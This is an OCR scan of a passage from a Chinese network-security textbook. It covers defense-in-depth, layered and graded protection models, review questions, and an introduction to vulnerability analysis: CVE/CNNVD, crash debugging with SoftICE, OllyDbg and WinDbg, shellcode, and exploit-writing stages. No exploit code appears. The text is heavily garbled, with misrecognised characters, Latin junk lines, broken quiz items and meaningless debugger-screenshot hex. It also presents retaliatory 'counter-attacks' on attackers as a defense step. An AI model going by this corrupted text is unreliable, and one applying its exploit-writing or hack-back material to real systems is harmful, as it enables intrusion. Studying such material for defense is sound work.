“ 织 深 防御 ”的 概念 可 以 应 用 于 很 多 领域 ,在 网 络 主动 防御 系统 中 提出 纵深 防御 策略 主 
要 是 使 网 络 主动 防御 系统 中 的 各 个 子 系统 形成 一 个 层次 性 的 纵深 防御 体系 。 网 络 主动 防御 
系统 中 的 纵 座 防御 策略 的 层次 结构 ,如 图 2-4 BAN o 





网 络 安全 通信 


图 2-4 ”纵深 防御 策略 的 层次 结构 


纵 帝 防御 宁 略 是 一 个 层次 性 的 循环 防御 有 略 , 即 从 第 一 层 的 “ 预 屠 ?到 最 后 一 层 的 “ 反 
击 ”, 然 后 一 个 完整 的 防御 过 程 又 为 以 后 的 “预警 ?提供 玫 助 。 该 层次 性 的 结构 可 以 根据 网 络 
攻击 的 这 入 程度 提供 人 不同 层次 的 防护 。 纵 次 防御 条 略 的 防护 流程 如 下 。 

CI) 根据 对 已 经 发 生 的 网 络 攻击 或 正在 发 生 的 网 络 攻 击 及 其 趋势 的 分 析 , 以 及 对 本 地 
网 络 的 安全 性 分 析 ,预警 对 可 能 发 生 的 网 络 攻 击 提 出 警告 。 

(2) 网 络 系统 的 各 种 剑 护 手段 (如 防火 场 ) 除 了 在 平时 根据 其 各 上 月 的 安全 策略 正常 运行 
外 ,还 要 对 预警 发 出 的 警告 做 出 反应 ,从 而 能 够 在 本 防护 阶段 最 大 限度 地 阻止 网 络 攻击 
行为 。 

(3) 检测 手段 包括 入 侵 检测 、 网 络 监控 、 网 络 系统 信息 和 漏洞 信息 检测 等 。 其 中 的 漏洞 
信息 检测 在 纵 次 防御 的 春 干 阶段 都 要 用 到 预警 .检测 和 反击 等 。 入 侵 检 测 检 测 到 了 网络 的 人 
侵 行为 后 ,要 及 时 通知 其 他 的 防护 手段 ,如 防火 墙 、 网 络 监控 ,网 络 攻击 响应 等 。 网 络 监控 系 
统 不 仅 可 以 实时 监控 本 地 网 络 的 行为 ,从 而 阻止 来 日 内 部 网 络 的 攻击 ,同时 也 可 作为 人 侵 检 

(4) 只 有 及 时 啊 应 ,才能 使 网 络 攻击 造成 的 损失 降 到 最 低 。 这 里 的 啊 应 除了 根据 检测 
的 入 侵 行为 及 时 地 调整 相关 手段 (如 防火 墙 \ 网 络 监 控 ) 来 阻止 进一步 的 网 络 攻 击 , 还 包括 其 
他 主动 积极 的 搁 术 ,如 网 络 你 机 、 网 络 攻 击 诱骗 ,网络 攻击 源 精确 定位 和 电子 取证 等 。 网 络 
僚机 一 方面 可 以 牺牲 月 己 来 保护 网 络 ; 男 一 方面 也 可 以 收集 网 络 攻击 者 信息 ,为 攻击 源 定 
位 和 电子 取证 提供 信息 。 网 络 攻击 诱骗 可 以 显 首 提高 网 络 攻 击 的 代价 ,并 可 以 将 网 络 攻击 
流量 引导 到 其 他 主机 上 。 网 络 攻击 源 定 位 除了 可 以 利用 网 络 僚机 和 网 络 攻击 诱 统 的 信息 
外 ,还 可 以 利用 其 他 技术 (如 移动 Ageni、 智 能 分 布 式 Agnet. 流量 分 析 ) 来 定位 攻击 源 。 攻 
击 取 证 综合 利用 以 上 信息 ,根据 获得 的 网 络 攻 击 者 的 详细 信息 进行 电子 取证 ,为 法 律 起 诉 和 
网 络 有 反问 攻击 提供 法 律 竺 据 。 

(5) 但 受 到 网 络 攻 击 后 ,除了 及 时 阻止 网 络 攻 击 外 ,还 要 及 时 恢复 仁 到 破坏 的 本 地 系 
统 , 开 及 时 地 对 外 提供 正常 的 服务 。 
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(6) 网 络 反 回 攻 击 是 防护 流程 的 最 后 一 步 , 也 是 网 络 主动 防御 系统 中 最 重要 的 一 步 。 
根据 获得 的 网 络 攻击 者 的 详细 信息 ,网 络 反 回 攻击 综合 运用 探测 类 .阻塞 类 漏洞 类 、 控 制 
AS X Ug K MUI ER M d E XETI odi. 

3. 分 层 防护 模型 

网 络 主动 防御 系统 体系 结构 是 一 个 三 维 的 立体 结构 ,分 为 3 个 层面 , 即 技 术 层 面 、 生 上 略 
和 安全 技术 管理 层面 。 技 术 层 面 分 为 6 层 和 一 个 信息 安全 通信 协议 。 这 6 层 分 别 为 预警 、 
保护 、 检 测 . 啊 应 .恢复 和 反击 。 宁 略 和 安全 技术 管理 层面 包括 纵 洗 防御 案 略 和 安全 技术 管 
理 。 安 全 技术 管理 对 6 层 的 技术 进行 管理 , 纵 次 防御 策略 使 得 6 层 的 技术 在 统一 的 安全 条 
略 下 能 协调 工作 ,来 共同 构筑 一 个 多 层 纵 深 的 防护 体系 。 安 全 管理 除了 体现 在 策略 和 安全 
技术 管理 层面 对 安全 技术 进行 管理 外 ,还 体现 在 管理 层面 对 人 员 的 安全 管理 .对 政策 的 安全 
管理 和 其 他 必要 的 安全 管理 。 

C1) 预 辕 。 预 导 是 指 对 可 能 发 生 的 网 络 攻击 给 出 预先 的 警告 ,包括 漏洞 预警 、 行 为 预 
葡 、 攻 击 趋势 预警 和 情报 收集 分 析 预 警 。 漏 洞 预 警 是 根据 公布 的 已 知 的 系统 漏洞 或 研究 发 
现 的 系统 漏洞 来 对 可 能 发 生 的 网 络 攻击 提出 预警 ; 行为 预警 是 通过 分 析 网 络 黑 客 的 各 种 行 
为 来 发 现 其 可 能 要 进行 的 网 络 攻击 ; 攻击 趋势 预警 是 分 析 已 发 生 或 正在 发 生 的 网 络 攻击 来 
判断 可 能 的 网 络 攻击 ; 情报 收集 分 析 预 导 是 绽 合 分 析 通 过 各 种 途径 收集 来 的 情报 判断 是 人 否 
有 发 生 网 络 攻击 的 可 能 性 。 

(2) 保护 。 保 护 是 指 采 用 一 切 手 段 保护 信息 系统 的 可 用 性 .机密 性 、 完 整 性 、 可 控 性 和 
不 可 否认 性 。 这 些 手 段 一 般 是 指 静态 的 防护 手段 ,如 防火 二 、 防 病毒 .虚拟 专用 网 (VPN)、 
操作 系统 安全 增强 等 。 

(3) 检测 。 在 网 络 主动 防御 系统 体系 结构 中 ,检测 是 非常 重要 的 一 个 环节 。 检 测 的 目 
的 是 发 现 网 络 攻击 ,检测 本 地 网 络 存在 的 非法 信息 流 , 以 及 检测 本 地 网 络 存 在 的 安全 漏洞 ， 
从 而 有 效 地 阻止 网 络 攻击 。 检 测 部 分 主要 用 到 的 技术 有 入 侵 检测 技术 、 网 络 实时 监控 技术 
和 信息 安全 扫 摘 技术 等 。 

(4) 啊 应 。 啊 应 是 指 对 危及 信息 安全 的 事件 和 行为 做 出 反应 ,阻止 对 信息 系统 的 进 一 
步 破 坏 并 使 损失 降 到 最 低 。 这 就 要 求 在 检测 到 网 络 攻击 后 及 时 地 阻 断 网 络 攻 击 , 或 者 将 网 
络 攻击 引诱 到 其 他 主机 上 去 ,使 网 络 攻击 不 能 对 信息 系统 造成 进一步 破坏 。 另 外 ,还 需要 对 
网 络 攻击 源 定位 ,进行 网 络 攻击 取证 ,为 诉 诸 法 律 和 网 络 反 击 做 准备 。 

(5) 恢复 。 及 时 地 恢复 系统 ,使 系统 能 尽快 正常 地 对 外 提供 服务 ,是 降低 网 络 攻击 造成 
损失 的 有 效 途 径 。 为 了 能 保证 受到 攻击 后 及 时 成 功 地 恢复 系统 ,必须 在 平时 做 好 备份 工作 。 
不 仅 包 括 对 信息 系统 所 存储 的 有 用 数据 进行 备份 恢复 工作 ,还 包括 对 信息 系统 本 映 进 行 备 
份 居 复工 作 。 备 份 技术 有 现场 内 备份 .现场 外 备份 和 冷 热 备份 3 种 。 

(6) 反击 。 反 击 是 指 对 网 络 攻击 者 进行 反 回 的 攻击 。 网 络 反 回 攻 击 就 是 综合 运用 各 种 
网 络 攻 击 手段 对 网 络 攻 击 痢 进行 攻击 ,迫使 其 停止 攻击 。 这 些 攻击 手段 包括 探测 类 攻击 、 阻 
EK PC vr .漏洞 类 攻击 du il AS Ii ub LEX Jio 2s Cil HUS SE 2S IX ua. PA Se I8] Dicit: B Sz is 
慎重 ,必须 在 遵守 道德 和 国家 法 律 的 前 提 下 进行 。 

4. 等 级 保护 模型 

随 着 下 一 代 网 络 与 通信 设备 的 广泛 采用 ,网 络 等 级 保护 已 经 成 为 一 个 难题 。 传 统 的 安 
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ERREEN FR BEAM AS In] E> p SCR AC VETI UR BY PI PRESE. HIE. TI PRISES S PAIR 
Y SES DR AP A AS In] SS CCS De GE a fri H9] BE. FF HL Bi SDR Software Designed Radio) 在 
各 个 领域 中 的 应 用 ,物理 隅 离 已 经 越 来 越 难以 实现 。 

多 级 安全 (Multi Level Security,MLS) 是 网 络 等 级 保护 的 实质 内 容 。MLS 要 求 一 个 通 
信 设 施 能 够 同时 进行 不 同安 全 等 级 的 数据 通信 ,并 且 菏 安全 级 别 网 络 上 的 数据 既 要 与 较 低 
安全 级 别 网 络 进行 通信 ,同时 也 要 与 较 高 安全 级 别 的 网 络 进行 通信 。 因 此 ,可 互 操作 性 的 实 
现 需 要 一 个 完善 的 MLS 解决 方案 ,要 求 对 高 可 徘 的 便 件 和 软件 进行 集成 。 虽 然 可 编程 密 
码 的 实现 有 望 成 为 一 种 良好 的 解决 办 法 ,但 现在 还 没有 真正 的 MLS 解决 方案 。 目 前 等 级 
保护 的 方法 是 采用 多 重 独 立 安 全 级 别 (Multiple Independent Levels of Security. MILS) 系 
统 及 组 件 。 

KH MILS 来 进行 不 同 网 络 等 级 的 安全 保护 ,边界 防护 是 最 重要 的 机 制 之 一 。 边 界 防 
护 是 指 如 何 对 进出 该 等 级 网 络 的 数据 进行 有 效 的 控制 与 监视 。 有 效 的 控制 指 施 包括 防火 
墙 、 边 界 护 卫 、 虚 拟 专 用 网 (VPN) 及 对 于 还 程 用 户 的 标识 与 鉴别 /访问 控制 ; 有 效 的 监视 机 
制 包 括 基 于 网 络 的 人 侵 检测 系统 (IDS) .脆弱 性 扫 摘 融 与 局 域 网 中 的 病毒 检测 着。 

边界 保护 主要 考 谍 的 问题 是 如 何 使 某 个 安全 等 级 的 网 络 内 部 不 受 来 上 月 外 部 的 攻击 , 提 
供 各 种 机 制 防止 恶意 的 内 部 人 员 览 越 边界 实施 攻击 ,防止 外 部 人 员 通 过 开放 门户 /隐蔽 通道 
进入 网 络 内 部 。 边 界 防护 包括 许多 防御 措施 ,还 包括 撑 程 访 问安 全 级 别 之 间 互 操作 等 许多 
功能 。 

边界 防护 策略 要 求 对 所 有 进入 网 络 内 部 的 数据 进行 人 侵 检 测 , 采 用 足够 的 按 施 对 融 安 
全 级 别 的 一 方 实施 保护 ,同时 加 密 技 术 不 得 损害 检测 性 能 ; 男 外 ,为 某 一 级 别 安全 网 络 提供 
远程 访问 的 系统 和 网 络 必须 与 该 等 级 安全 网 络 的 安全 开 上 略 一 致 ,所 支持 的 远程 访问 也 要 求 
协议 一 致 ,得 到 网 络 边 界 的 认证 ,并 确保 大 量 的 远程 访问 不 会 危及 该 安全 网 络 , 远 程 访 问 将 
要 求 采 用 获得 许可 的 技术 进行 认证 ; 将 基础 设施 建立 在 多 级 安全 策略 上 也 是 一 个 很 好 的 选 
择 , 有 利于 解决 不 同安 全 级 别 之 间 的 互 操 作 问题 。 


2.4 ht 
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攻击 模型 及 Red Team IM Brit; te AY . A ar dh | PDRR 模型 纵深 防护 模型 ,分 层 防护 模 
型 及 等 级 保护 模型 4 种 信息 网 络 防 护 模 型 。 


ji 2 


1l. 下 列 哪些 行为 在 预 攻 击 过 程 实施 ( m 


A. 获得 网 络 拓扑 D. 漏洞 利用 

C. 获得 攻击 主机 IP D. 提升 远程 用 户 系统 权限 
2. 攻击 者 通过 下 列 ( ””) 手 段 开 辟 后 门 。 

A. 添加 超级 用 户 D. 植 人 木马 程序 


C. 建立 秘密 传输 通道 D. 修改 系统 配置 文件 
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3. 和 下列 各 项 属于 Cyber-Terrorist 攻击 模型 中 威胁 模型 的 是 ( 


YD n 由 


A. AX B. 工具 C. 环境 


. M Red Team "P ff H Bod: P B5 JU SR ss o 
. 何 述 PDRR 模型 中 4 个 部 分 的 作用 。 

. dn] XS JA DR DT GD R Wes PP Dj AP o TE o 

. 何 述 等 级 保护 模型 产生 的 原因 。 


D. imi 


CH AP TER 3 


系统 漏洞 分 析 及 相关 标准 Sim 


3.1 概述 


3.1.1 系统 漏洞 相关 概念 


话 洞 是 指 茶 种 与 安全 束 略 相 冲 突 的 状态 或 错误 ,是 一 种 有 利于 威胁 行为 
发 生 的 条 件 。CC 标准 指出 , 湄 洞 是 风险 产生 的 根源 ,威胁 主体 利用 汤 洞 进行 
攻击 ,从 而 寻 致 安全 事件 的 发 生 。 

从 攻击 者 的 角度 来 说 ,攻击 能 人 耕 成 功 取 决 于 目标 系统 的 源 洞 。 攻 击 的 要 
点 在 于 发 现 信息 网 络 系统 中 的 漏洞 ,然后 利用 该 洗 洞 进行 攻击 。 因 此 ,漏洞 
分 析 搁 术 非 党 重要 ,是 攻击 痢 必 备 技术 之 一 。 


3.1.2 系统 漏洞 分 析 研 究 现状 


安全 漏洞 检测 依赖 于 安全 漏洞 发 现 , 因 此 漏洞 原创 性 发 现成 为 最 具 挑 战 
性 的 研究 工作 。 当 前 ,从 事 安 全 洗 洞 分 析 的 部 门 主要 来 和 目 大 学 政府、 车 方 、 
安全 公司 、 黑 客 团 体 每。 美国 加 州 大 学 安全 实验 室 、 普 渡 大 学 的 COAST K 
i 8 CERT SOE FE BB] OTe ths Hal BY |] ea TE FEE TT PR A HE. HERS 
VAS AE 3$ PA 28 F E AR bd A PI EA 

在 漏洞 信息 发 布 方面 ,美国 CERT 最 具有 代表 性 , 它 是 最 早 提 供 向 
Internet 发 布 漏洞 信息 的 研究 机 构 。 而 在 漏洞 信息 标准 化 工作 上 ,Mitre JF 
发 "通用 漏洞 列表 (Common Vulnerabilities and Exposures, CVE)” 3c H yù is 
洞 命 名 统一 性 ,同时 Mitre ih WE fll H1 JT 35 BY di ibl PE A £i COpen Vulnerability 


Assessment Language, OVAL) . VA FH Fim ihi] s; W SE 28: UE i, H AI E TE 3X AE SE 
善之 中 。 


据 国外 Security Focus 公司 的 安全 漏洞 统计 数据 表明 , 绝 大 部 分 操作 系 
统 人 存在 安全 漏洞 。 一 些 应 用 软件 面临 同样 的 问题 。 再 加 上 管理 .软件 复杂 性 
等 问题 ,信息 产品 的 安全 独 洞 还 未 能 解决 。 由 于 安全 漏洞 分 析 事 关 重 大 , 安 
全 省 洞 发 现 技术 细 市 一 般 不 对 外 公布 ,如 Windows 平台 上 的 RPC 安全 漏 
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洞 ,尽管 国外 安全 组 织 已 经 报告 ,但 安全 漏洞 分 析 过 程 及 利用 该 漏洞 的 条 件 始终 没有 透露 。 
基于 国家 利益 考虑 ,日 本 成 立 六 信息 安全 缺陷 分 析 中 心 ” ,机构 职责 是 分 析 操 作 系 统 和 软件 
包 中 的 安全 缺陷 ,重点 是 分 析 日 本 各 政府 机 构 网 站 的 信息 安全 泌 洞 。 美 国 蒜 方 建立 了 “信息 
战 红 色 小 组 (Information Warfare Red Team) ”用 于 模拟 网 络 敌手 上 发现 DoD 系统 中 的 漏洞 ， 
3.1.3 漏洞 标准 

为 了 对 全 球 故 现 的 独 洞 进行 管理 , 设 定 相关 的 狂 洞 标准 ,其 中 较为 出 名 的 包括 美国 
MITRE 公司 维护 的 CVE 省 油库 和 中 国信 息 安 全 测评 中 心 的 狂 洞 库 CNNVD。 

CVE 提供 了 一 个 关于 漏洞 命名 统一 标识 标准 ,给 出 了 漏洞 安全 标准 摘 述 ,以 及 漏洞 字 
典 服务 。 通 过 CVE ,不 同安 全 组 织 便于 交换 共享 漏洞 信息 。CVE 成 为 国际 最 权威 的 网 络 
安全 泌 洞 发布 组 织 , 其 成 员 包 括 众 多 全 球 若 名 安全 企业 和 人 研究 机 构 , 各 安全 厂商 均 以 所 发 现 
漏洞 被 CVE KAA. CVE 的 官方 网 址 是 “cve. mitre. org", 

中 国 国 家 信息 安全 漏洞 库 (CChina National Vulnerability Database of Information 
Security. CNNVD) ,隶属 于 中 国信 息 安 全 测评 中 心 ,是 中 国信 息 安 全 测评 中 心 为 切实 履行 
漏洞 分 析 和 风险 评 佑 的 职能 ,负责 建设 运 维 的 国家 级 信息 安全 漏洞 库 , 为 我 国信 息 安 全 
保障 提供 基础 服务 。 为 适应 互联 网 的 高 速 发 展 ,CNNVD 在 漏洞 收集 方面 , 面 回 国内 外 信 
县 安全 研究 机 构 和 个 人 爱好 者 推出 了 未 公开 漏洞 提交 受理 业务 。 在 漏洞 处 置 方面 针对 
接受 的 省 洞 ,进行 汤 洞 收集 、 汤 洞 验 证 、 汤 润 修 复 和 源 洞 通报 等 工作 。 际 此 之 外 ,CNNVD 
还 广泛 回 各 方 开 展 社 会 合作 ,如 专家 计划、 拉 术 文 择 单 位 .战略 合作 伙伴 和 日 帽子 注册 
计划 。 


3.2 air rix 


3.2.1 漏洞 分 析 技 术 模 型 


漏洞 分 析 技 术 是 指 在 漏洞 挖掘 的 基础 上 ,对 已 发 现 或 已 公布 漏洞 ,或 者 在 得 到 油 洞 触发 
样本 的 基础 上 进行 深入 分 析 , 为 源 洞 利用 、 补 救 等 处 理 挤 施 做 铺垫 。 传 统 的 汤 洞 分 析 技 术 模 
型 如 图 3-1 所 示 , 主 要 包括 信息 收集 、 调 试 分 析 和 利用 分 析 3 个 阶段 。 最 终结 来 是 分 析出 软 
件 中 引发 漏洞 的 问题 代码 , 港 消 汤 洞 形成 的 原因 ,确定 源 洞 的 危害 ,并 编写 出 相应 的 源 洞 利 
用 程序 。 






there ak A 


图 3-1 漏洞 分 析 模 型 
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3.2.2 信息 收集 


信息 收集 是 漏洞 分 析 技 术 中 很 重要 的 一 个 阶段 ,主要 是 在 动态 调试 之 前 做 一 些 漏洞 相 
Ani A BU SE SoH. dris CSS E SE AMT D ill Zr dii As .格式 信息 和 异常 信息 。 

1. 漏洞 公告 信息 

对 软件 开发 商 发 布 的 漏洞 公告 进行 分 析 , 主 要 获取 以 下 信息 。 

(1) 湄 洞 类 型 ,判断 是 堆栈 海 出 . 堆 潘 出 ,还 是 其 他 代码 执行 漏洞 ,以 及 漏洞 所 能 达到 的 
危害 级 别 。 

(2) 受 影 啊 软件 名 称 及 版 本 ,便于 分 析 软 件 的 收集 。 在 此 基础 上 ,针对 相应 的 可 执行 文 
件 进行 反 汇 编 分 析 。 

C3) 部 分 漏洞 细节 信息 ,导致 漏洞 的 出 错 代 码 或 出 错 函 数 的 位 置 。 

2. 格式 信息 

针对 湄 洞 涉 及 的 文件 格式 或 网 络 协议 做 一 定 的 了 解 , 便 于 后 续 测 试 过 程 中 的 异 第 构造 
和 人 处理。 

3. 异常 信息 


针对 得 到 的 样本 或 Fuzz 测试 产生 的 异常 测试 文档 ,观察 异常 时 的 进程 .线程 信息 ,程序 
的 堆栈 、 寄 存 器 状态 等 ， 


3.2.3 调试 分 析 


调试 分 析 是 漏洞 分 析 的 关键 阶段 。 通 过 信息 收集 找到 协议 或 文件 格式 中 容易 叶 致 漏洞 
产生 的 字段 。 将 这 些 字 上 段 填 元 为 日 己 的 数据 ,人 然后 进行 测试 。 无 论 是 服务 软件 ,还 是 一 般 的 
文件 解析 软件 ,在 测试 过 程 中 都 可 能 发 生 异 党 。 因 此 , 宕 要 通过 调试 如 来 拦截 这 些 异 常 , 跟 
踩 通信 或 文件 数据 在 代码 执行 过 程 中 的 存储 轨迹 , 即 数 据 流 ,以 确定 问题 代码 的 位 置 ,澄清 
汤 洞 形成 的 原因 。 在 这 个 过 程 中 ,有 以 下 几 个 问题 需要 解决 。 

1. 调试 器 选择 与 异常 拦截 

Windows 下 常用 的 湄 洞 调试 侨 包 括 SoftICE, OllyDbg, WinDbg 等 几 类 。 其 中 ,SoftICE 是 
公认 的 Windows 系统 下 最 强大 的 调试 器 , 它 工 作 在 系统 的 Ring0 级 ,在 调试 系统 底层 应 用 
的 时 候 比 其 他 调试 问好 用 ，。 

缓冲 区 溢出 、 内 存 非法 访问 等 操作 往往 会 导致 一 些 异 党 ,保护 模式 下 的 CPU 就 会 产生 
一 个 异 芝 中 断 , 在 Windows 下 程序 就 会 返回 到 ntdll. dll 中 的 KiUserExceptionDispatcher 
PRAE AY A, KiUserExceptionDispatcher 滁 数 的 参数 是 一 个 数据 结构 指针 ,该 数据 结构 包 
Th Soe ty ACHE INS EIP 等 守 和 存 胡 内 容 ( 即 现场 数据 )。 因 此 ,可 以 在 SoftICE 下 通过 BPX 命令 
设置 这 个 函数 断 点 ,进而 对 这 些 现场 数据 进行 分 析 , 最 终 判 断 是 否 真 的 存在 漏洞 。 

2. 数据 流 跟踪 

数据 流 是 指 通信 或 文件 数据 在 代码 执行 过 程 中 的 处 理 轨迹 ,如 数据 在 哪个 阶段 覆盖 到 
内 存 中 的 哪个 位 管 .存储 状态 等 。 数 据 流 的 跟踪 可 以 通过 设 管内 存 监视 点 和 对 异常 进行 拦 
截 两 种 方式 实现 。 

(1) 设置 内 存 监 视点 。 通 过 内 存 监 视点 ,可 以 在 特定 内 存 区 域 发 生变 化 时 停止 程序 , 进 
而 对 这 片区 域 的 数据 进行 分 析 。 通 常 在 SoftICE 下 通过 BPM 命令 设置 内 存 监视 点 。 
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(20 对 异常 进行 拦截 。 例 如 ,在 SoftICE 下 拦截 了 由 堆栈 洲 出 而 产生 的 异 和 背后 ,通过 
KiUserExceptionDispatcher 图 数 的 参数 信息 ,观察 异 稼 发 生 时 输入 数据 在 堆栈 中 的 位 置 、 
长 度 .完整 性 等 信息 。 

3. 漏洞 成 因 分 析 

问题 代码 是 指 软件 中 引发 漏洞 的 那 段 代 码 。 问 题 代 码 的 确定 是 漏洞 分 析 的 重要 目的 之 
一 。 确 定 了 问题 代码 所 在 的 位 置 也 就 得 到 了 汤 洞 形成 的 原因 。 通 过 对 异常 拦截 和 数据 流 跟 
蹊 , 可 以 确定 发 生 异 篆 时 代码 的 执行 位 置 及 内 存 、 奇 存 天 的 使 用 情况 。 绪 合 进一步 的 回溯 分 
析 ,可 以 确定 导致 漏洞 产生 的 那 段 汇编 代码 的 位 置 。 


3.2.4 利用 分 析 


漏洞 利用 分 析 主 要 是 指 在 对 漏洞 成 因 分 析 的 基础 上 ,根据 漏洞 的 不 同 表 现 ,确定 漏洞 利 
用 所 能 达到 的 危害 级 别 ,分 析 漏 洞 环境 对 利用 代码 的 要 求 , 编 与 合适 的 洗 洞 利用 工具 。 

1. 确定 漏洞 危害 级 别 

根据 将 洞 的 不 同 表现 ,有 些 泼 洞 可 以 导致 程序 的 拒绝 服务 ,有 些 程序 可 以 导致 远程 代码 
执行 ,有 些 可 以 达到 权限 提升 。 湄 洞 危 害 级 别 的 确定 依赖 于 利用 水 平 的 高 低 。 高 危 级 别 的 
漏洞 危害 就 是 远程 代码 执行 或 本 地 代码 执行 ,这 也 是 漏洞 控 气 和 利用 的 目的 。 

2. 分 析 利 用 要 求 

分 析 利 用 要 求 时 ,必须 先 提 及 漏洞 的 利用 代码 。 针 对 绝 大 多 数 的 漏洞 ,利用 代码 的 核心 
部 分 都 是 以 十 六 进 制 机 硕 码 的 形式 夹杂 在 输入 数据 中 的 , 称 为 Shellcode。Shellcode 一 般 是 
通过 C 语言 或 汇编 语言 编写 ,从 编 详 之 后 提取 生成 。 

如 果 设 计 准 确 , 可 以 使 得 在 漏洞 触发 的 时 候 CPU 跳 到 Shellcode 入 口 处 执行 ,进而 以 当 
前 登录 用 户 的 权限 控制 目标 系统 。 但 是 ,针对 不 同 的 漏洞 ,Shellcode 编写 存在 不 同 的 要 求 ， 
利 见 的 要 求 主 要 有 长 度 限 制 和 字符 编码 限制 。 在 调试 分 析 过 程 中 ,通过 观察 内 存 等 方法 仔 
细 分 析 漏 洞 利 用 代码 的 各 种 要 求 , 为 最 后 的 漏洞 利用 程序 编写 打下 良好 的 基础 。 

3. 编写 漏洞 利用 程序 

编写 漏洞 利用 程序 是 漏洞 分 析 的 最 后 一 个 阶段 。 程 序 代 码 一 般 分 为 主体 代码 与 
Shellcode 两 部 分 。 主 体 代 码 可 以 用 C、C++、Perl、Python 等 语言 编写 ,而 Shellcode 一 般 以 
汇编 提取 生成 为 主 。 如 果 汤 洞 是 协议 格式 解析 小 洞 ,主体 代码 的 功能 就 是 将 Shellcode 加 入 
数据 包 , 然 后 发 送 到 服务 端 ; 如 果 漏 洞 是 文件 格式 解析 漏洞 ,主体 代码 的 功能 就 是 将 
Shellcode 加 入 文件 数据 ,然后 生成 特定 文件 供 存 在 漏洞 的 软件 解析 。 


3.2.5 ”漏洞 分 析 实 践 方法 


漏洞 的 分 析 是 一 项 有 挑战 但 也 很 刺激 的 工作 ,目的 是 对 漏洞 进行 完整 的 分 析 重 现 。 漏 
洞 重 现 一 般 是 找到 漏洞 的 触发 条 件 和 步骤 ,能 稳定 地 重 现 漏洞 , 通 笛 需要 目 己 编写 POC 代 
码 。 以 下 是 几 类 做 漏洞 分 析 时 和 常用 的 工具 ，。 

虚拟 机 : VMWare。 

编辑 工具 : UltraEdit. WinHex. 

静态 分 析 工 具 ; IDA Pro 及 常用 插件 。 

动态 调试 工具 : OllyDbg/ OllyICE,SoftICE,WinDbg。OllyICE 是 OllyDbg 的 升级 版 。 





第 3 章 系统 漏洞 分 ES 

有 了 这 些 辅助 工具 ,就 有 了 进行 源 洞 分 析 的 基础 ,就 可 以 开始 进 
中 进行 漏洞 分 析 的 方法 主要 包含 以 下 几 种 ， 

动态 调试 

动态 调试 方法 是 指使 用 WinDbg 等 动态 调试 的 工具 打开 已 存在 漏洞 的 软件 或 附加 的 进 
程 ,动态 地 追踪 程序 的 执行 过 程 。 动 态 追 踪 , 可 以 通过 单 步 的 执行 每 一 条 汇编 指令 ,清晰 地 
了 解 到 程序 执行 的 流程 、 堆 栈 数 据 信 息 , 从 而 快速 地 定位 到 漏洞 产生 的 原因 。 巾 于 每 条 指令 
都 可 以 单 步 执 行 , 因 此 动态 调试 能 够 很 清楚 地 看 到 堆栈 的 分 配 和 使 用 情况 ,也 能 够 动态 跟踪 
到 程序 处 理 输入 参数 的 详细 情况 ,采用 动态 调试 跟 踊 ,可 以 层 层 逆 向 回溯 到 发 生 溢出 的 漏洞 
PRAE. FA 3-2 和 图 3-3 为 使 用 OllyDbg 和 WinDbg 动态 调试 漏洞 的 示意 图 ,从 图 3-2 中 可 以 
看 出 堆栈 的 详细 信息 及 汇编 指令 。 


井 行 分 析 J. - 般 在 实践 


C| File View Debug Plugins Options Window Help Tools BreakPoint-> 


Poused [aa pe] an) wisi piu | ed u|r[|w|r]w|u|c]|x]u|n]--|s] tsi] Emane 


aacE7Dí0 EET: ^ Registers (HHX) 
GH5E/D41 BE 88585188 |mou esi,ollydbg .8851^4888 FAX 
BB5E7DA6 SDBE BBDGEEFi|lea edi, ECX 
HOSE7DAC C787 FSF9116| mov EDX 
HSE /D56 d edi EBX 00205000 
HASE7DS? BRICD FI or ebp, ESP 
9605E7m5 有 | .. EB BE NES short ollydbg .885E7Dóh ERP 















































Ollydbg_ 
ollydbg 


.&HoduleEntryPoint? 
-&HoduleEntryPoint? 


üg5EzD5p 9 g EDI 
üg5F7D5t 9 
üg5E7D5| 9 EIP 


ollydbg .«HoduleEntryPoint? 
ollydbg .<ModuleEntryPoint> 


oOllydbg .<ModuleEntryPoint> 


BH2B 37bit 
BB23 : 
BB2B 32 


B(FFFFFFFF) 
8(FFFFFFFF) 
G(FFFFFFFF) 
TAI | | 


Address 
HASES HOR 
HOSES 816 
BASES AZA 
HOSES O36 
üü5E8 058 
HASES HSH 
HOSES HÄH 
uBa5ES887 8 
üg5ES EG 
ü85Es8 8098 
HOSES and 
HHSES BBB 
Ha5EsS aca 
HOSES apa 
HASES HER 
AASESOF Ë 
ud5E81B 
HBa5E8118 
| H85E812 B 


Mi Mz M3 M4 M5 


Hex dump 77 DERE DE 

HA HH AA 8H) 5 “WF 92 4A) 6G AA HA 86) AN be T 
01 00 HG 00/50 00 H0 80| 07 HA 00 B0 ES 
06 86 AA AA 4A 83 AA 26| BA AA HH|EH Ii 
OC 06 686 66)460 OE 86 86) BE AA ag AG 
10 UENIUNT] ee d HO) zy 
üH HÖ BB 本 是 | 把 | 2 4A HH Bd 

61 86 AG | Ji 66) 62 68 pA 

ü3 HB BB E 8H| dà AA 68 

05 80 00 a|: 1 686 80/06 00 60 0A 

Hf nn 86 AL HB 86 0A HB B8 AA 

Ha Hb H | | 

660 DF 16 86/34 61 AA 86/68 AA HA AA 

üH HB HB GE | 2 4ñj| OO HB BB AA 

ü9 84 BB 86) 0 H HB BH) Ys EH To Bb) o4 
HH WH HH HEJH | HH) Ge HH HH HH 

6 8H 86 86) A A AA 69 ^4 AA AA 

C8 E1 16 00j|4 j gH HH|UH HB HH HH 

AA AA AA AA|5 2 4Aj| 0A AA AA AA 

09 64 AA 88) ZA HH FG E2 16 BB): 


= = 
EE fo 
L J 


Co c m 


Command: 


? e8[.. 


Ba 
8H 


AO 80 


8ü 
BH 
86 
8 


1 80 
v2 A 


Bü 
na 
ad] 
He 
AA 
na 
68 
AH 
AA 


0019FF8h 
ü019FF88 
HO19F FSC 
BH19FF98 
日 四 19FF 
0019FF98 
ag19FF9C 
O019F FAG 
B8HTUFFRA 
B019FFAS 
BeatT9FFAC 
OO19F FBO 
ag19FFBh 
6019F FBS 
B8HTUFFBE 
aaeiorrca 
üg19FFCH 
BUHTOUFFCB 
BBISFFCE 
OH19F FDO 


图 3-2 利用 OllyDbg 进行 动态 分 析 


Command - Kernel ‘com:port=\\.\pipe\com_2,baud=115200 pipe’ - 


IMachine Name: 


IEernel base = 02804068000 PsLoadedModuleList 


System Uptime: not available 


/oD162C4 
60205006 
f6D162A6 
FEF BF ABD 
HH19FFDC 
f/f Ff DGFDY 
HAZDS HHH 
9C3GASAA 
üBBHBHHH 
年 合生 生生 生生 站 
68205606 
HAHAH 
aagngaggd] 
生生 
üBBHHHHH 
9C3I6A5AA 
HO1TYFFAG 
HHH00008 
